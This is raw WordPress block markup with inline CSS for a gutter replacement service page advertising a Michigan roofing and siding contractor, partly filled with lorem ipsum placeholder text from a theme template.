padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-cf17220e-f4d6-4ae6-916b-7443f7483c2f\" style=\"width:33%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:shortcode -->\n[footermenu menu=\"Services\"]\n<!-- /wp:shortcode --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"width\":67,\"topPaddingMobile\":40,\"blockId\":\"0cb880bb-8643-4209-a6cc-115212c50ad3\"} -->\n<style type=\"text/css\"> .block-0cb880bb-8643-4209-a6cc-115212c50ad3 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-0cb880bb-8643-4209-a6cc-115212c50ad3 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-0cb880bb-8643-4209-a6cc-115212c50ad3 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-0cb880bb-8643-4209-a6cc-115212c50ad3 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-0cb880bb-8643-4209-a6cc-115212c50ad3 .skt-blocks-block-column{\n padding-top: 40px; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-0cb880bb-8643-4209-a6cc-115212c50ad3\" style=\"width:67%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/advanced-heading {\"block_id\":\"01f0da2e-d4f9-4e36-9a52-97c027439fab\",\"showSubHeading\":false,\"showSeparator\":false,\"headSpacing\":10,\"headingTitleFontFamily\":\"Teko\",\"headingTitleFontSize\":52,\"headingTitleFontSizeMobile\":30,\"headingTitleFontSizeTablet\":32,\"headingTitleFontWeight\":\"700\",\"headingTitleLineHeight\":1.2,\"headingTitleLetterSpacing\":1,\"headingTitleColor\":\"#343434\",\"headingAlignment\":\"left\",\"headingAlignmentTablet\":\"left\",\"headingAlignmentMobile\":\"left\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-01f0da2e-d4f9-4e36-9a52-97c027439fab .responsive-heading-title-text {\n font-size: 52px !important; margin-bottom: 10px !important; }\n\n.skt-blocks-block-advanced-heading.block-01f0da2e-d4f9-4e36-9a52-97c027439fab .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-01f0da2e-d4f9-4e36-9a52-97c027439fab .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (min-width: 768px) and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-01f0da2e-d4f9-4e36-9a52-97c027439fab .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-01f0da2e-d4f9-4e36-9a52-97c027439fab .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-01f0da2e-d4f9-4e36-9a52-97c027439fab .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-01f0da2e-d4f9-4e36-9a52-97c027439fab .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-01f0da2e-d4f9-4e36-9a52-97c027439fab .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-01f0da2e-d4f9-4e36-9a52-97c027439fab .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-01f0da2e-d4f9-4e36-9a52-97c027439fab .responsive-heading-title-text {\n font-size: 32px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-01f0da2e-d4f9-4e36-9a52-97c027439fab .responsive-heading-title-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-01f0da2e-d4f9-4e36-9a52-97c027439fab .responsive-heading-desc-text {\n font-size: undefinedpx !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-advanced-heading.block-01f0da2e-d4f9-4e36-9a52-97c027439fab {\n text-align: left; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-advanced-heading.block-01f0da2e-d4f9-4e36-9a52-97c027439fab {\n text-align: left; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-01f0da2e-d4f9-4e36-9a52-97c027439fab {\n text-align: left; }\n}\n</style><div class=\"skt-blocks-block-advanced-heading block-01f0da2e-d4f9-4e36-9a52-97c027439fab\"><h2 class=\"responsive-heading-title-text\" style=\"font-family:Teko;font-weight:700;line-height:1.2;letter-spacing:1px;color:#343434\">Gutter Replacement </h2></div>\n<!-- /wp:skt-blocks/advanced-heading -->\n\n<!-- wp:heading {\"level\":1} -->\n<h1 id=\"headline\">In need of gutter replacement in Saginaw? Our gutter replacement specialists are ready to help. Why<strong> Us?</strong></h1>\n<!-- /wp:heading -->\n\n<!-- wp:list -->\n<ul><li><strong>Professional Service</strong></li><li><strong>Gutter Replacement</strong></li><li><strong>Gutter Installation</strong></li><li><strong>All Types of Gutters</strong></li><li><strong>All Material Types</strong></li><li><strong>Downspout Services</strong></li><li><strong>Gutter Covers &amp; Leaf Guards</strong></li><li><strong>High Customer Satisfaction</strong></li><li><strong>Residential and Commercial Service</strong></li></ul>\n<!-- /wp:list -->\n\n<!-- wp:skt-blocks/advance-columns {\"columns\":1,\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"35f3b882-a96a-4182-be6f-1c6bdb4d72e1\"} -->\n<style type=\"text/css\"> .block-35f3b882-a96a-4182-be6f-1c6bdb4d72e1 .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-35f3b882-a96a-4182-be6f-1c6bdb4d72e1 .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-35f3b882-a96a-4182-be6f-1c6bdb4d72e1 .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-35f3b882-a96a-4182-be6f-1c6bdb4d72e1 .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-35f3b882-a96a-4182-be6f-1c6bdb4d72e1 .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-35f3b882-a96a-4182-be6f-1c6bdb4d72e1 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-35f3b882-a96a-4182-be6f-1c6bdb4d72e1 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-35f3b882-a96a-4182-be6f-1c6bdb4d72e1 skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-1\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"width\":100,\"topPadding\":30,\"bottomPadding\":30,\"topPaddingTablet\":30,\"bottomPaddingTablet\":30,\"topPaddingMobile\":30,\"bottomPaddingMobile\":30,\"blockId\":\"264037b9-5df4-468c-811d-8b3c0b40d53c\"} -->\n<style type=\"text/css\"> .block-264037b9-5df4-468c-811d-8b3c0b40d53c .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-264037b9-5df4-468c-811d-8b3c0b40d53c .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-264037b9-5df4-468c-811d-8b3c0b40d53c .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-264037b9-5df4-468c-811d-8b3c0b40d53c .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-264037b9-5df4-468c-811d-8b3c0b40d53c .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-264037b9-5df4-468c-811d-8b3c0b40d53c\" style=\"width:100%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/image-slider {\"gutter\":0,\"gutterMobile\":0,\"lightbox\":true,\"gridSize\":\"xlrg\",\"height\":500,\"autoPlay\":true,\"autoPlaySpeed\":\"3000\",\"borderWidth\":10,\"iconBackgroundRadius\":0,\"iconBackgroundOpacity\":100,\"iconBackgroundColor\":\"#ffffff\",\"borderColor\":\"#0d2e63\",\"iconColor\":\"#012257\",\"borderStyle\":\"solid\",\"counterId\":\"e7c79c75-dbee-4db9-a78e-ab428612139b\"} -->\n<style type=\"text/css\"> .block-id-e7c79c75-dbee-4db9-a78e-ab428612139b .flickity-button .flickity-button-icon {\n fill: #012257; }\n .skt-blocks-gallery.block-id-e7c79c75-dbee-4db9-a78e-ab428612139b .flickity-button {\n background-color: rgba(255, 255, 255, 1); border-radius: 0%; }\n .block-id-e7c79c75-dbee-4db9-a78e-ab428612139b .skt-blocks-gallery--item figure {\n height: 480px; }\n</style><div class=\"\"><div class=\"block-id-e7c79c75-dbee-4db9-a78e-ab428612139b is-cropped skt-blocks-gallery has-no-alignment has-caption-style-dark has-lightbox\"><div class=\"has-carousel has-carousel-xlrg\" style=\"height:500px\" data-flickity=\"{&quot;autoPlay&quot;:3000,&quot;draggable&quot;:true,&quot;pageDots&quot;:false,&quot;prevNextButtons&quot;:true,&quot;wrapAround&quot;:true,&quot;cellAlign&quot;:&quot;center&quot;,&quot;pauseAutoPlayOnHover&quot;:false,&quot;freeScroll&quot;:false,&quot;arrowShape&quot;:{&quot;x0&quot;:10,&quot;x1&quot;:60,&quot;y1&quot;:50,&quot;x2&quot;:65,&quot;y2&quot;:45,&quot;x3&quot;:20},&quot;thumbnails&quot;:false,&quot;responsiveHeight&quot;:false}\"><div class=\"skt-blocks-gallery--item\" style=\"border-width:10px;border-style:solid;border-color:#0d2e63\"><figure class=\"skt-blocks-gallery--figure\"><img src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/slider1-1024x597.jpg\" alt=\"\" data-id=\"36\" data-link=\"https://sktperfectdemo.com/themepack/gbrenovate/home/slider1/\" class=\"wp-image-36\"/></figure></div><div class=\"skt-blocks-gallery--item\" style=\"border-width:10px;border-style:solid;border-color:#0d2e63\"><figure class=\"skt-blocks-gallery--figure\"><img src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/slider2-1024x597.jpg\" alt=\"\" data-id=\"34\" data-link=\"https://sktperfectdemo.com/themepack/gbrenovate/home/slider2/\" class=\"wp-image-34\"/></figure></div></div></div></div>\n<!-- /wp:skt-blocks/image-slider --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns -->\n\n<!-- wp:paragraph -->\n<p>You’re one step away from connecting with a specialist who can complete your Gutter Replacement project.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list {\"ordered\":true} -->\n<ol><li>Submit one easy form.</li><li>Connect with a local specialist.</li><li>Get a quick quote.</li><li>Enjoy your completed home project.</li></ol>\n<!-- /wp:list -->\n\n<!-- wp:paragraph {\"style\":{\"color\":{\"text\":\"#494848\"}},\"className\":\"section-content\",\"fontSize\":\"normal\"} -->\n<p class=\"section-content has-text-color has-normal-font-size\" style=\"color:#494848\">Dunrite Roofing And Siding Based in Northern Oakland County We have served Northern Oakland County and the surrounding areas for over 25 years. Quality workmanship and competitive pricing have led us to become a top choice when it comes to roofing and siding in southeastern Michigan.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Call (248) 393-5000</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Fill out our contact form <a href=\"https://cteisys.com/contact-layout-1/\">here.</a> We will get back with you soon.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:skt-blocks/advanced-heading {\"block_id\":\"0a850fcc-c7cf-45d0-b803-6269cf9549f0\",\"showSubHeading\":false,\"showSeparator\":false,\"headSpacing\":10,\"headingTitleFontFamily\":\"Teko\",\"headingTitleFontSize\":44,\"headingTitleFontSizeMobile\":30,\"headingTitleFontSizeTablet\":32,\"headingTitleFontWeight\":\"700\",\"headingTitleLineHeight\":1.2,\"headingTitleLetterSpacing\":1,\"headingTitleColor\":\"#343434\",\"headingAlignment\":\"left\",\"headingAlignmentTablet\":\"left\",\"headingAlignmentMobile\":\"left\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-0a850fcc-c7cf-45d0-b803-6269cf9549f0 .responsive-heading-title-text {\n font-size: 44px !important; margin-bottom: 10px !important; }\n\n.skt-blocks-block-advanced-heading.block-0a850fcc-c7cf-45d0-b803-6269cf9549f0 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-0a850fcc-c7cf-45d0-b803-6269cf9549f0 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (min-width: 768px) and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-0a850fcc-c7cf-45d0-b803-6269cf9549f0 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-0a850fcc-c7cf-45d0-b803-6269cf9549f0 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-0a850fcc-c7cf-45d0-b803-6269cf9549f0 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-0a850fcc-c7cf-45d0-b803-6269cf9549f0 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-0a850fcc-c7cf-45d0-b803-6269cf9549f0 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-0a850fcc-c7cf-45d0-b803-6269cf9549f0 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-0a850fcc-c7cf-45d0-b803-6269cf9549f0 .responsive-heading-title-text {\n font-size: 32px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-0a850fcc-c7cf-45d0-b803-6269cf9549f0 .responsive-heading-title-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-0a850fcc-c7cf-45d0-b803-6269cf9549f0 .responsive-heading-desc-text {\n font-size: undefinedpx !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-advanced-heading.block-0a850fcc-c7cf-45d0-b803-6269cf9549f0 {\n text-align: left; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-advanced-heading.block-0a850fcc-c7cf-45d0-b803-6269cf9549f0 {\n text-align: left; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-0a850fcc-c7cf-45d0-b803-6269cf9549f0 {\n text-align: left; }\n}\n</style><div class=\"skt-blocks-block-advanced-heading block-0a850fcc-c7cf-45d0-b803-6269cf9549f0\"><h2 class=\"responsive-heading-title-text\" style=\"font-family:Teko;font-weight:700;line-height:1.2;letter-spacing:1px;color:#343434\">Where Caring for Our Community matters</h2></div>\n<!-- /wp:skt-blocks/advanced-heading -->\n\n<!-- wp:paragraph {\"className\":\"section-content\"} -->\n<p class=\"section-content\">Fusce congue augue sollicitudin dignissim ultricies. Pellentesque id tristique quam. Aliquam pharetra vehicula dolor, et dictum ante males mollis. Aenean ultricies vulputate urna eget fringilla.Morbi fringilla ex ut velit gravida, a tempus dui rutrum. Maecenas feugiatings lorem et neque tristique, pulvinar andye pulvinar ligula convallis. Mauris dictiumoe augue sed rhoncus ultricies. Donec mi purus, viverra egetine vulputate ac, finieebus nec velit. Mauris hendrerit, neque eu dictum efficitur, ipsum urna andyee sempr lorem, vitae hendrerit diam tortor nec nibh. Fusce a pharetra libero.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:skt-blocks/section {\"blockId\":\"5b454c6b-b036-4df1-b709-faa4cc3e5182\",\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0} -->\n<div class=\"wp-block-skt-blocks-section skt-blocks-block-section-outer-wrap block-5b454c6b-b036-4df1-b709-faa4cc3e5182 background-type-none alignundefined\" style=\"z-index:1;max-width:900px;margin-left:auto;margin-right:auto\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-5b454c6b-b036-4df1-b709-faa4cc3e5182 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 10px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-5b454c6b-b036-4df1-b709-faa4cc3e5182 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 10px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-5b454c6b-b036-4df1-b709-faa4cc3e5182 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; }\n}\n .block-5b454c6b-b036-4df1-b709-faa4cc3e5182.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 0),rgba(255, 255, 255, 0)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-5b454c6b-b036-4df1-b709-faa4cc3e5182.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-5b454c6b-b036-4df1-b709-faa4cc3e5182.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-5b454c6b-b036-4df1-b709-faa4cc3e5182.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-5b454c6b-b036-4df1-b709-faa4cc3e5182.background-type-video .skt-blocks-block-section {\n background-color: rgba(255, 255, 255, 0); }\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"a01244d7-d93e-48ac-8738-370d1cf8f3f4\"} -->\n<style type=\"text/css\"> .block-a01244d7-d93e-48ac-8738-370d1cf8f3f4 .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-a01244d7-d93e-48ac-8738-370d1cf8f3f4 .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-a01244d7-d93e-48ac-8738-370d1cf8f3f4 .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-a01244d7-d93e-48ac-8738-370d1cf8f3f4 .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-a01244d7-d93e-48ac-8738-370d1cf8f3f4 .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-a01244d7-d93e-48ac-8738-370d1cf8f3f4 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-a01244d7-d93e-48ac-8738-370d1cf8f3f4 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-a01244d7-d93e-48ac-8738-370d1cf8f3f4 skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-2\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":5,\"rightPadding\":5,\"leftPaddingTablet\":5,\"rightPaddingTablet\":5,\"topPaddingMobile\":0,\"bottomPaddingMobile\":0,\"topMarginMobile\":0,\"bottomMarginMobile\":0,\"blockId\":\"8e4ba042-e26a-42f8-8c9c-3ac59848f67f\"} -->\n<style type=\"text/css\"> .block-8e4ba042-e26a-42f8-8c9c-3ac59848f67f .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-8e4ba042-e26a-42f8-8c9c-3ac59848f67f .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-8e4ba042-e26a-42f8-8c9c-3ac59848f67f .skt-blocks-block-column{\n padding-top: 0px; padding-bottom: 0px; padding-left: 5px; padding-right: 5px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-8e4ba042-e26a-42f8-8c9c-3ac59848f67f .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: 5px; padding-right: 5px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-8e4ba042-e26a-42f8-8c9c-3ac59848f67f .skt-blocks-block-column{\n padding-top: 0px; padding-bottom: 0px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: 0px; margin-bottom: 0px; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-8e4ba042-e26a-42f8-8c9c-3ac59848f67f\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:image {\"align\":\"center\",\"id\":21,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image aligncenter size-large\"><img src=\"https://cteisys.com/wp-content/uploads/2021/05/instruction-img.jpg\" alt=\"\" class=\"wp-image-21\"/></figure>\n<!-- /wp:image --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":5,\"rightPadding\":5,\"leftPaddingTablet\":5,\"rightPaddingTablet\":5,\"topPaddingMobile\":0,\"bottomPaddingMobile\":0,\"blockId\":\"bdaf4d20-c4be-4a61-a8cb-3ca12d370a8d\",\"blockBorderRadius\":5} -->\n<style type=\"text/css\"> .block-bdaf4d20-c4be-4a61-a8cb-3ca12d370a8d .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-bdaf4d20-c4be-4a61-a8cb-3ca12d370a8d .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-bdaf4d20-c4be-4a61-a8cb-3ca12d370a8d .skt-blocks-block-column{\n padding-top: 0px; padding-bottom: 0px; padding-left: 5px; padding-right: 5px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-bdaf4d20-c4be-4a61-a8cb-3ca12d370a8d .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: 5px; padding-right: 5px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-bdaf4d20-c4be-4a61-a8cb-3ca12d370a8d .skt-blocks-block-column{\n padding-top: 0px; padding-bottom: 0px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-bdaf4d20-c4be-4a61-a8cb-3ca12d370a8d\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none;border-radius:5px\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:image {\"align\":\"center\",\"id\":224,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image aligncenter size-large\"><img src=\"https://cteisys.com/wp-content/uploads/2021/05/services-single.jpg\" alt=\"\" class=\"wp-image-224\"/></figure>\n<!-- /wp:image --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns --></div></section></div>\n<!-- /wp:skt-blocks/section -->\n\n<!-- wp:paragraph {\"className\":\"section-content\"} -->\n<p class=\"section-content\">Fusce congue augue sollicitudin dignissim ultricies. Pellentesque id tristique quam. Aliquam pharetra vehicula dolor, et dictum ante males mollis. Aenean ultricies vulputate urna eget fringilla.Morbi fringilla ex ut velit gravida, a tempus dui rutrum. Maecenas feugiatings lorem et neque tristique, pulvinar andye pulvinar ligula convallis. Mauris dictiumoe augue sed rhoncus ultricies. Donec mi purus, viverra egetine vulputate ac, finieebus nec velit. Mauris hendrerit, neque eu dictum efficitur, ipsum urna andyee sempr lorem, vitae hendrerit diam tortor nec nibh. Fusce a pharetra libero.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph {\"className\":\"section-content\"} -->\n<p class=\"section-content\">Fusce congue augue sollicitudin dignissim ultricies. Pellentesque id tristique quam. Aliquam pharetra vehicula dolor, et dictum ante males mollis. Aenean ultricies vulputate urna eget fringilla.Morbi fringilla ex ut velit gravida, a tempus dui rutrum. Maecenas feugiatings lorem et neque tristique, pulvinar andye 